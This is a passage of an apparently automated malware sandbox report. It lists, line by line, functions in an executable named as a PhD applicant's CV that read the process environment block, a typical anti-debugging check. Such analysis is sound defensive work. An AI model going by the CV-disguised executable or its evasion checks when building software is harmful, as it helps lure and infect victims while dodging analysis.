                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6237A mov eax, dword ptr fs:[00000030h]2_2_00F6237A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0371 mov eax, dword ptr fs:[00000030h]2_2_00FC0371
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0371 mov eax, dword ptr fs:[00000030h]2_2_00FC0371
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E363 mov eax, dword ptr fs:[00000030h]2_2_00F7E363
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A350 mov eax, dword ptr fs:[00000030h]2_2_00F7A350
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F38347 mov eax, dword ptr fs:[00000030h]2_2_00F38347
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F38347 mov eax, dword ptr fs:[00000030h]2_2_00F38347
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F38347 mov eax, dword ptr fs:[00000030h]2_2_00F38347
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F78322 mov eax, dword ptr fs:[00000030h]2_2_00F78322
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F78322 mov eax, dword ptr fs:[00000030h]2_2_00F78322
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F78322 mov eax, dword ptr fs:[00000030h]2_2_00F78322
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E328 mov eax, dword ptr fs:[00000030h]2_2_00F3E328
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E328 mov eax, dword ptr fs:[00000030h]2_2_00F3E328
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3E328 mov eax, dword ptr fs:[00000030h]2_2_00F3E328
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5E310 mov eax, dword ptr fs:[00000030h]2_2_00F5E310
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5E310 mov eax, dword ptr fs:[00000030h]2_2_00F5E310
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5E310 mov eax, dword ptr fs:[00000030h]2_2_00F5E310
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7631F mov eax, dword ptr fs:[00000030h]2_2_00F7631F
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE630E mov eax, dword ptr fs:[00000030h]2_2_00FE630E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F464F0 mov eax, dword ptr fs:[00000030h]2_2_00F464F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE44F8 mov eax, dword ptr fs:[00000030h]2_2_00FE44F8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE44F8 mov eax, dword ptr fs:[00000030h]2_2_00FE44F8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A4F0 mov eax, dword ptr fs:[00000030h]2_2_00F7A4F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A4F0 mov eax, dword ptr fs:[00000030h]2_2_00F7A4F0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE4F2 mov eax, dword ptr fs:[00000030h]2_2_00FCE4F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE4F2 mov eax, dword ptr fs:[00000030h]2_2_00FCE4F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E4EF mov eax, dword ptr fs:[00000030h]2_2_00F7E4EF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E4EF mov eax, dword ptr fs:[00000030h]2_2_00F7E4EF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F644D1 mov eax, dword ptr fs:[00000030h]2_2_00F644D1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F644D1 mov eax, dword ptr fs:[00000030h]2_2_00F644D1
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD84BB mov eax, dword ptr fs:[00000030h]2_2_00FD84BB
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7E4BC mov eax, dword ptr fs:[00000030h]2_2_00F7E4BC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100A553 mov eax, dword ptr fs:[00000030h]2_2_0100A553
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F424A2 mov eax, dword ptr fs:[00000030h]2_2_00F424A2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F424A2 mov ecx, dword ptr fs:[00000030h]2_2_00F424A2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F744A8 mov eax, dword ptr fs:[00000030h]2_2_00F744A8
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC490 mov eax, dword ptr fs:[00000030h]2_2_00FCC490
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40485 mov ecx, dword ptr fs:[00000030h]2_2_00F40485
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7648A mov eax, dword ptr fs:[00000030h]2_2_00F7648A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7648A mov eax, dword ptr fs:[00000030h]2_2_00F7648A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7648A mov eax, dword ptr fs:[00000030h]2_2_00F7648A
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48470 mov eax, dword ptr fs:[00000030h]2_2_00F48470
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48470 mov eax, dword ptr fs:[00000030h]2_2_00F48470
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE461 mov eax, dword ptr fs:[00000030h]2_2_00FCE461
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E45E mov eax, dword ptr fs:[00000030h]2_2_00F6E45E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E45E mov eax, dword ptr fs:[00000030h]2_2_00F6E45E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E45E mov eax, dword ptr fs:[00000030h]2_2_00F6E45E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E45E mov eax, dword ptr fs:[00000030h]2_2_00F6E45E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E45E mov eax, dword ptr fs:[00000030h]2_2_00F6E45E
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50445 mov eax, dword ptr fs:[00000030h]2_2_00F50445
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC0443 mov eax, dword ptr fs:[00000030h]2_2_00FC0443
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD6400 mov eax, dword ptr fs:[00000030h]2_2_00FD6400
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD6400 mov eax, dword ptr fs:[00000030h]2_2_00FD6400
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F3640D mov eax, dword ptr fs:[00000030h]2_2_00F3640D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC5FC mov eax, dword ptr fs:[00000030h]2_2_00FCC5FC
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A5E7 mov ebx, dword ptr fs:[00000030h]2_2_00F7A5E7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A5E7 mov eax, dword ptr fs:[00000030h]2_2_00F7A5E7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEE5E0 mov eax, dword ptr fs:[00000030h]2_2_00FEE5E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F765D0 mov eax, dword ptr fs:[00000030h]2_2_00F765D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C5C6 mov eax, dword ptr fs:[00000030h]2_2_00F7C5C6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC05C6 mov eax, dword ptr fs:[00000030h]2_2_00FC05C6
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F445B0 mov eax, dword ptr fs:[00000030h]2_2_00F445B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F445B0 mov eax, dword ptr fs:[00000030h]2_2_00F445B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC85AA mov eax, dword ptr fs:[00000030h]2_2_00FC85AA
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F72594 mov eax, dword ptr fs:[00000030h]2_2_00F72594
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_0100A464 mov eax, dword ptr fs:[00000030h]2_2_0100A464
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC592 mov eax, dword ptr fs:[00000030h]2_2_00FCC592
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE588 mov eax, dword ptr fs:[00000030h]2_2_00FBE588
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE588 mov eax, dword ptr fs:[00000030h]2_2_00FBE588
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A580 mov eax, dword ptr fs:[00000030h]2_2_00F7A580
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7A580 mov eax, dword ptr fs:[00000030h]2_2_00F7A580
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD6550 mov eax, dword ptr fs:[00000030h]2_2_00FD6550
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5E547 mov eax, dword ptr fs:[00000030h]2_2_00F5E547
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F76540 mov eax, dword ptr fs:[00000030h]2_2_00F76540
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F78540 mov eax, dword ptr fs:[00000030h]2_2_00F78540
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4254C mov eax, dword ptr fs:[00000030h]2_2_00F4254C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82539 mov eax, dword ptr fs:[00000030h]2_2_00F82539
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F5252B mov eax, dword ptr fs:[00000030h]2_2_00F5252B
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC51D mov eax, dword ptr fs:[00000030h]2_2_00FCC51D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E507 mov eax, dword ptr fs:[00000030h]2_2_00F6E507
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F42500 mov eax, dword ptr fs:[00000030h]2_2_00F42500
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C50D mov eax, dword ptr fs:[00000030h]2_2_00F7C50D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C50D mov eax, dword ptr fs:[00000030h]2_2_00F7C50D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC6F2 mov eax, dword ptr fs:[00000030h]2_2_00FBC6F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBC6F2 mov eax, dword ptr fs:[00000030h]2_2_00FBC6F2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F4C6E0 mov eax, dword ptr fs:[00000030h]2_2_00F4C6E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F666E0 mov eax, dword ptr fs:[00000030h]2_2_00F666E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F666E0 mov eax, dword ptr fs:[00000030h]2_2_00F666E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD66D0 mov eax, dword ptr fs:[00000030h]2_2_00FD66D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FD66D0 mov eax, dword ptr fs:[00000030h]2_2_00FD66D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FEE6D0 mov eax, dword ptr fs:[00000030h]2_2_00FEE6D0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F406CF mov eax, dword ptr fs:[00000030h]2_2_00F406CF
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE86C2 mov eax, dword ptr fs:[00000030h]2_2_00FE86C2
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F48690 mov eax, dword ptr fs:[00000030h]2_2_00F48690
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCC691 mov eax, dword ptr fs:[00000030h]2_2_00FCC691
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F50680 mov eax, dword ptr fs:[00000030h]2_2_00F50680
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40670 mov eax, dword ptr fs:[00000030h]2_2_00F40670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82670 mov eax, dword ptr fs:[00000030h]2_2_00F82670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F82670 mov eax, dword ptr fs:[00000030h]2_2_00F82670
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov esi, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov eax, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7666D mov eax, dword ptr fs:[00000030h]2_2_00F7666D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FCE660 mov eax, dword ptr fs:[00000030h]2_2_00FCE660
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov eax, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov ecx, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7265C mov eax, dword ptr fs:[00000030h]2_2_00F7265C
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C640 mov eax, dword ptr fs:[00000030h]2_2_00F7C640
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C640 mov eax, dword ptr fs:[00000030h]2_2_00F7C640
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F40630 mov eax, dword ptr fs:[00000030h]2_2_00F40630
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70630 mov eax, dword ptr fs:[00000030h]2_2_00F70630
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov esi, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov eax, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FC8633 mov eax, dword ptr fs:[00000030h]2_2_00FC8633
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F7C620 mov eax, dword ptr fs:[00000030h]2_2_00F7C620
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_01014600 mov eax, dword ptr fs:[00000030h]2_2_01014600
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F6E7E0 mov eax, dword ptr fs:[00000030h]2_2_00F6E7E0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov eax, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FE47B4 mov ecx, dword ptr fs:[00000030h]2_2_00FE47B4
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDC7B0 mov eax, dword ptr fs:[00000030h]2_2_00FDC7B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FDC7B0 mov eax, dword ptr fs:[00000030h]2_2_00FDC7B0
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F407A7 mov eax, dword ptr fs:[00000030h]2_2_00F407A7
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00FBE79D mov eax, dword ptr fs:[00000030h]2_2_00FBE79D
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F70774 mov eax, dword ptr fs:[00000030h]2_2_00F70774
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44779 mov eax, dword ptr fs:[00000030h]2_2_00F44779
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F44779 mov eax, dword ptr fs:[00000030h]2_2_00F44779
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F52760 mov ecx, dword ptr fs:[00000030h]2_2_00F52760
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov ecx, dword ptr fs:[00000030h]2_2_00F62755
                Source: C:\Users\user\Desktop\Maryam Farokhi-PhD- CV-1403.exeCode function: 2_2_00F62755 mov eax, dword ptr fs:[00000030h]2_2_00F62755
